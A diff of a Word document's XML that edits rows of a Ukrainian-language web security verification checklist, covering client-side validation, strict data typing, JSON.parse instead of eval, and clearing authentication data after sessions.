-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">фреймворк не </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>розріщняє</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> джерело параметрів запиту (</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>GET</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>POST</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>cookies</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, заголовки, навколишнього середовища і т.д.)</w:t>
+              <w:t>Перевірка при аналізі JSON в браузерах, що JSON.parse використовується для розбору JSON на стороні клієнта. Не використовуйте Eval () для розбору JSON на стороні клієнта.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18741,6 +21398,44 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18771,11 +21466,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18806,13 +21511,61 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що дані</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> аутентифікації</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> видаляються зі сховища клієнта, наприклад, DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в браузері</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, після того, як сеанс завершується.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18843,1235 +21596,42 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>4.10</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся, що перевірк</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>а</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> на стороні клієнта використовується в якості другої лінії оборони, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">разом з </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> перевірк</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ою</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> на стороні сервера.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.11</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що структуровані дані </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>строго</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> типізован</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>і</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> і звіряються</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> з</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
